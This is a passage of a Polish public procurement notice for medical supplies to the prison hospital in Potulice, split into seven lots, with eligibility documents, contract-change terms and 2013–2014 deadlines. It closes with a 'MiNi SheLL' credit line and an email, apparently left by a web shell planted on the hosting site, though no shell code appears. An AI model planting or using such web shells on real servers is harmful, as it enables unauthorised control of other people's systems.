Przedmiot zamówienia, to zaokrągla liczbę opakowań do całości, pod warunkiem, że zaokrąglenie zawsze będzie w górę, np. 10,7 op. = 11 op. lub 10,1 op. = 11 op. Niedopuszczalne jest zaniżanie przez wykonawcę określonej w siwz ilości całkowitej danego artykułu, podanej w sztukach.
13.	Wyroby medyczne zaoferowane przez wykonawcę muszą spełniać wymagania określone w ustawie z dnia 20 maja 2010r. o wyrobach medycznych (Dz. U. z 2010r. Nr 107, poz. 679).
14.	Miejsce, sposób, terminy dostaw oraz forma i termin płatności.
1)	Dostawy w/w artykułów medycznych do szpitala Zamawiającego zlokalizowanego w Zakładzie Karnym w Potulicach.
2)	Wykonawca dostarczać będzie ww artykuły medyczne na swój koszt, zgodnie z warunkami transportowymi określonymi przez producenta wyrobu medycznego. Jeżeli transportowanie danego wyrobu medycznego wymaga warunków specjalnych, np. musi być przechowywany w chłodnej temperaturze, do dostawy takiego wyrobu medycznego wykonawca dołącza test, który potwierdzi sposób jego przechowywania w czasie transportowania.
3)	Realizacja dostaw w dni robocze (poniedziałek-piątek) w godzinach 7:00 - 14:30, w uzgodnionych terminach lub w ciągu 72 godzin od złożenia zamówienia. 
4)	Termin płatności 30 dni, forma płatności przelew..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 33.10.00.00-1, 33.19.25.00-7, 33.14.12.00-2, 33.14.00.00-3, 33.14.18.10-1, 33.14.11.19-7.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 7.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.10.2014.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia warunków udziału w postępowaniu zostanie dokonana na zasadzie: spełnia lub nie spełnia poszczególne warunki. 2) Zamawiający dokona oceny spełnienia warunków udziału określonych w art. 22 ust. 1 i w art. 24 ust. 1 ustawy Pzp, które zostały również określone w siwz w rozdziale VIII. pkt 1. i pkt 2., na podstawie złożonych do oferty oświadczeń i dokumentów, o których mowa w siwz rozdział IX, tj. podpisane oświadczenie o spełnieniu warunków udziału w postępowaniu ( załącznik nr 2 do siwz)</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia warunków udziału w postępowaniu zostanie dokonana na zasadzie: spełnia lub nie spełnia poszczególne warunki. 2) Zamawiający dokona oceny spełnienia warunków udziału określonych w art. 22 ust. 1 i w art. 24 ust. 1 ustawy Pzp, które zostały również określone w siwz w rozdziale VIII. pkt 1. i pkt 2., na podstawie złożonych do oferty oświadczeń i dokumentów, o których mowa w siwz rozdział IX, tj. podpisane oświadczenie o spełnieniu warunków udziału w postępowaniu ( załącznik nr 2 do siwz)</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia warunków udziału w postępowaniu zostanie dokonana na zasadzie: spełnia lub nie spełnia poszczególne warunki. 2) Zamawiający dokona oceny spełnienia warunków udziału określonych w art. 22 ust. 1 i w art. 24 ust. 1 ustawy Pzp, które zostały również określone w siwz w rozdziale VIII. pkt 1. i pkt 2., na podstawie złożonych do oferty oświadczeń i dokumentów, o których mowa w siwz rozdział IX, tj. podpisane oświadczenie o spełnieniu warunków udziału w postępowaniu ( załącznik nr 2 do siwz)</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia warunków udziału w postępowaniu zostanie dokonana na zasadzie: spełnia lub nie spełnia poszczególne warunki. 2) Zamawiający dokona oceny spełnienia warunków udziału określonych w art. 22 ust. 1 i w art. 24 ust. 1 ustawy Pzp, które zostały również określone w siwz w rozdziale VIII. pkt 1. i pkt 2., na podstawie złożonych do oferty oświadczeń i dokumentów, o których mowa w siwz rozdział IX, tj. podpisane oświadczenie o spełnieniu warunków udziału w postępowaniu ( załącznik nr 2 do siwz)</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia warunków udziału w postępowaniu zostanie dokonana na zasadzie: spełnia lub nie spełnia poszczególne warunki. 2) Zamawiający dokona oceny spełnienia warunków udziału określonych w art. 22 ust. 1 i w art. 24 ust. 1 ustawy Pzp, które zostały również określone w siwz w rozdziale VIII. pkt 1. i pkt 2., na podstawie złożonych do oferty oświadczeń i dokumentów, o których mowa w siwz rozdział IX, tj. podpisane oświadczenie o spełnieniu warunków udziału w postępowaniu ( załącznik nr 2 do siwz)</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>

<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 10 i 11 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.	Strony ustalają, że treść umowy może ulec zmianie zgodnie z art. 144 ustawy Prawo zamówień publicznych (t.j. Dz. U. z 2013r poz. 907 ze zm.).
2.	Zmiany postanowień niniejszej umowy mogą dotyczyć w szczególności:
1)	nazwy, adresu oraz osób reprezentujących strony, a także osób wymienionych w § 6 pkt 1 i/lub pkt 2;
2)	cen artykułów wymienionych w załączniku nr 1 do umowy, o kwotę nie większą niż wynikającą ze wskaźnika cen towarów i usług konsumpcyjnych, podanego przez GUS publikowanego na stronie internetowej: www.stat.gov.pl. Wskaźnik cen towarów i usług konsumpcyjnych liczony jest miesięcznie od terminu obowiązywania umowy, o którym mowa w § 2 pkt 1;
3)	urzędowej stawki podatku VAT na artykuły wymienione w załączniku nr 1 do umowy;
4)	każdej zmiany, która jest korzystna lub neutralna dla zamawiającego, lub zmiany której nie można było przewidzieć 
na etapie prowadzonego postępowania o udzielenie zamówienia publicznego;
5)	terminu zakończenia (przedłużenia) obowiązywania niniejszej umowy, o którym mowa w § 2 pkt 1, z zastrzeżeniem 
§ 3 pkt 3.
3.	Strona wnioskująca o zmianę postanowień niniejszej umowy niezwłocznie i pisemnie powiadamia o tym fakcie drugą stronę, uzasadniając zmianę okolicznościami faktycznymi i prawnymi oraz przedkłada propozycję aneksu do umowy.
4.	Zmiany postanowień niniejszej umowy wymagają potwierdzenia pisemnego w postaci aneksu, z zastrzeżeniem pkt 5 i pkt 6.
5.	Strony dopuszczają możliwość okresowych dostaw artykułów po cenie niższej niż określonej w załączniku nr 1 do umowy (tzw. promocja). Zmiany te nie wymagają potwierdzenia pisemnego w postaci aneksu do umowy.
6.     Strony dopuszczają możliwość okresowych dostaw artykułów w większych opakowaniach niż określone w załączniku nr 1 
po cenie nie wyższej niż określonej w załączniku nr 1 do umowy (tzw. promocja). Zmiany te nie wymagają potwierdzenia pisemnego w postaci aneksu do umowy.
7.	Zmiana postanowień niniejszej umowy na podstawie pkt 2 ppkt 2) nie może następować częściej niż raz na kwartał.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.zp.sw.gov.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Zakład Karny, Aleja Parkowa 1 , 89-120 Potulice..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 08.10.2013 godzina 12:00, miejsce: Zakład Karny, Aleja Parkowa 1 , 89-120 Potulice, sekretariat.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> nie dotyczy.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> grupa 1 - Plastiki.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Dostawa 12 artykułów medycznych, których szczegółowy opis i ilość znajduje sie w siwz.Ilości szacunkowe artykułów medycznych mogą ulec zmianie w trakcie trwania umowy. Ostateczna ilość zamawianych artykułów medycznych będzie wynikała 
z faktycznych potrzeb zamawiającego w okresie obowiązywania umowy..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.10.00.00-1.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.10.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Grupa 2 - stomatologia.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Dostawa 21 artykułów medycznych, których szczegółowy opis i ilość znajduje sie w siwz.Ilości szacunkowe artykułów medycznych mogą ulec zmianie w trakcie trwania umowy. Ostateczna ilość zamawianych artykułów medycznych będzie wynikała 
z faktycznych potrzeb zamawiającego w okresie obowiązywania umowy..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.13.15.10-5.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.10.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Grupa 3 - probówki.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Dostawa 10 artykułów medycznych, których szczegółowy opis i ilość znajduje sie w siwz.Ilości szacunkowe artykułów medycznych mogą ulec zmianie w trakcie trwania umowy. Ostateczna ilość zamawianych artykułów medycznych będzie wynikała 
z faktycznych potrzeb zamawiającego w okresie obowiązywania umowy..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.19.25.00-7.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.10.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> grupa 4 - Art. różne.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Dostawa 21 artykułów medycznych, których szczegółowy opis i ilość znajduje sie w siwz.Ilości szacunkowe artykułów medycznych mogą ulec zmianie w trakcie trwania umowy. Ostateczna ilość zamawianych artykułów medycznych będzie wynikała 
z faktycznych potrzeb zamawiającego w okresie obowiązywania umowy..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.12.00-2.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.10.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Grupa 5 - Art. Ochronne.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Dostawa 6 artykułów medycznych, których szczegółowy opis i ilość znajduje sie w siwz.Ilości szacunkowe artykułów medycznych mogą ulec zmianie w trakcie trwania umowy. Ostateczna ilość zamawianych artykułów medycznych będzie wynikała 
z faktycznych potrzeb zamawiającego w okresie obowiązywania umowy..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.00.00-3.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.10.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> grupa 6.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Dostawa 26 artykułów medycznych, których szczegółowy opis i ilość znajduje sie w siwz.Ilości szacunkowe artykułów medycznych mogą ulec zmianie w trakcie trwania umowy. Ostateczna ilość zamawianych artykułów medycznych będzie wynikała 
z faktycznych potrzeb zamawiającego w okresie obowiązywania umowy..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.18.10-1.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.10.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> Grupa 7.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Dostawa 66 artykułów medycznych, których szczegółowy opis i ilość znajduje sie w siwz.Ilości szacunkowe artykułów medycznych mogą ulec zmianie w trakcie trwania umowy. Ostateczna ilość zamawianych artykułów medycznych będzie wynikała 
z faktycznych potrzeb zamawiającego w okresie obowiązywania umowy..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.11.19-7.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.10.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com